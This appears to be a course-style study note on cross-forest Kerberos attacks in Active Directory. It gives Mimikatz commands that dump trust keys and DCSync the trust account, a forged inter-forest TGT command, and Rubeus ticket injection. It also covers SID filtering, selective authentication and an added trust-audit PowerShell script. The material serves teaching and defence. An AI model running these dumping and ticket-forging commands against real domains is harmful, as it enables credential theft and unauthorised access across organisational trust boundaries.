Cross Forest Attacks

General

  • Same attack flow as with cross-domain attacks: dump the trust key, forge an inter-realm TGT with it, then request service tickets in the other forest

  • But: a trust between forests must be established manually by the administrators of both forests

  • No implicit trust (unlike parent/child domains inside one forest, which trust each other automatically and transitively)

  • Cannot abuse the SID history attribute (no /sids with the Enterprise Admins SID of the target) because SID filtering is enabled by default on forest trusts

  • We only get the privileges that the user we are impersonating has actually been granted in the target forest (e.g. explicit ACLs on shares or group memberships that include foreign principals)

Exploitation

# Get the trust key for the inter-forest trust. Any one of the three commands works;
# the first two dump it from LSA on the DC, the third pulls the trust account's
# hash via DCSync (the trust account is named after the other forest's domain)
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\ecorp$"'

# Forge the inter-forest TGT (referral ticket): /sid is the SID of our own domain,
# /rc4 is the trust key dumped above, /service:krbtgt with /target set to the
# other forest makes this a ticket the target forest's DC will accept.
# No /sids: any extra SIDs would be stripped by SID filtering anyway
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /user:Administrator /target:eurocorp.local /rc4:9a3dafc4139bc3fb7b6dade2a35d6f74 /service:krbtgt /ticket:forest_tgt.kirbi"'

# Use the forged referral TGT to request a TGS for the CIFS service on the
# target forest's DC and inject it into the current session (Rubeus)
.\Rubeus.exe asktgs /ticket:forest_tgt.kirbi /service:cifs/eurocorp-dc.eurocorp.local /dc:eurocorp-dc.eurocorp.local /ptt

# Check access. Only shares where dcorp\Administrator has been granted access
# in the target forest will be readable, there is no automatic admin access
ls \\eurocorp-dc.eurocorp.local\SharedWithDCorp\

Mitigation

SID Filtering

  • Prevents attacks which abuse the SID history attribute across a forest trust: SIDs that do not belong to the trusted forest (e.g. an injected Enterprise Admins SID of the trusting forest) are stripped from the ticket

  • Enabled by default on all inter-forest trusts. Intra-forest trusts (parent/child, tree-root) do not filter SIDs at all, because Microsoft considers the forest, not the domain, to be the security boundary

  • But, since SID filtering can break applications and user access (typically after migrations that rely on SID history), it is often relaxed or disabled with netdom trust ... /EnableSIDHistory:Yes (forest trusts) or /quarantine:No (external trusts). The current state is visible in the trustAttributes of the trust object or in the SIDFilteringForestAware / SIDFilteringQuarantined properties returned by Get-ADTrust

Selective Authentication

  • If configured on an inter-forest trust, users from the trusted forest are not automatically authenticated to every server in the trusting forest

  • Individual access to domains and servers in the trusting domain/forest must be granted explicitly: the foreign user or group needs the "Allowed to Authenticate" permission on each computer object it should reach. Without it, even a valid (or forged) inter-forest ticket is rejected
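The following PowerShell script is an added example, not code from the original page or from the course it summarises. It audits the trusts of the current domain for both mitigations above (SID filtering and selective authentication) by decoding the raw trustAttributes flags documented in MS-ADTS 6.1.6.7.9, and prints the netdom command that would fix each weak trust. It assumes the ActiveDirectory module (RSAT) is installed and that the caller can read trust objects; the -Server parameter is a hypothetical convenience for auditing a domain the host is not joined to.

```powershell
# Added example: audit domain trusts for SID filtering and selective authentication.
# Bit values are the trustAttributes flags from MS-ADTS 6.1.6.7.9.
Import-Module ActiveDirectory

$TA_QUARANTINED_DOMAIN = 0x4    # SID filtering on an external trust (netdom /quarantine:Yes)
$TA_FOREST_TRANSITIVE  = 0x8    # forest trust
$TA_CROSS_ORGANIZATION = 0x10   # selective authentication (netdom /SelectiveAuth:Yes)
$TA_WITHIN_FOREST      = 0x20   # intra-forest (parent/child, tree-root) trust
$TA_TREAT_AS_EXTERNAL  = 0x40   # forest trust relaxed to external-style filtering (netdom /EnableSIDHistory:Yes)

function ConvertFrom-TrustAttributes {
    # Decode the raw trustAttributes integer into the flags relevant to these mitigations.
    param([Parameter(Mandatory)][int]$Attributes)
    [pscustomobject]@{
        WithinForest    = ($Attributes -band $TA_WITHIN_FOREST)      -ne 0
        ForestTrust     = ($Attributes -band $TA_FOREST_TRANSITIVE)  -ne 0
        Quarantined     = ($Attributes -band $TA_QUARANTINED_DOMAIN) -ne 0
        TreatAsExternal = ($Attributes -band $TA_TREAT_AS_EXTERNAL)  -ne 0
        SelectiveAuth   = ($Attributes -band $TA_CROSS_ORGANIZATION) -ne 0
    }
}

function Get-TrustAudit {
    # Returns one object per trust with its effective SID filtering / selective auth
    # state and the netdom remediation. netdom's first argument is the trusting domain,
    # so the commands below apply to our outbound direction; for a bidirectional trust
    # the admins of the other forest run the same for their direction.
    param([string]$Server)   # hypothetical: DC of the domain to audit (optional)
    $getParams = @{ Filter = '*'; Properties = 'trustAttributes' }
    if ($Server) { $getParams.Server = $Server }

    foreach ($t in Get-ADTrust @getParams) {
        $f = ConvertFrom-TrustAttributes -Attributes $t.trustAttributes
        $issues = @()
        if ($f.WithinForest) {
            # Same forest: SIDs are never filtered here, by design (forest = security boundary).
            $issues += 'intra-forest trust: SID filtering does not apply, forest is the boundary'
            $sidFiltering = 'n/a'
        } elseif ($f.ForestTrust) {
            # Forest trust: filtered by default unless relaxed via TREAT_AS_EXTERNAL.
            $sidFiltering = -not $f.TreatAsExternal
            if ($f.TreatAsExternal) {
                $issues += "SID history allowed across forest trust; run: netdom trust $($t.Source) /domain:$($t.Target) /EnableSIDHistory:No"
            }
        } else {
            # External trust: filtered only if the quarantine flag is set.
            $sidFiltering = $f.Quarantined
            if (-not $f.Quarantined) {
                $issues += "external trust without SID filtering; run: netdom trust $($t.Source) /domain:$($t.Target) /quarantine:Yes"
            }
        }
        if (-not $f.WithinForest -and -not $f.SelectiveAuth) {
            $issues += "selective authentication off; run: netdom trust $($t.Source) /domain:$($t.Target) /SelectiveAuth:Yes"
        }
        [pscustomobject]@{
            Trust         = $t.Name
            Direction     = $t.Direction
            ForestTrust   = $f.ForestTrust
            SidFiltering  = $sidFiltering
            SelectiveAuth = $f.SelectiveAuth
            Issues        = ($issues -join '; ')
        }
    }
}

# Run from a host joined to the domain under review, e.g. dollarcorp.moneycorp.local in the scenario above.
Get-TrustAudit | Format-Table -AutoSize -Wrap
```

Read the Issues column as the list of configuration weaknesses the attack above relies on: a forest trust reported with SidFiltering False means a forged referral TGT could carry extra SIDs, and SelectiveAuth False means any principal from the trusted forest can authenticate to every server in the trusting forest that grants it access.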
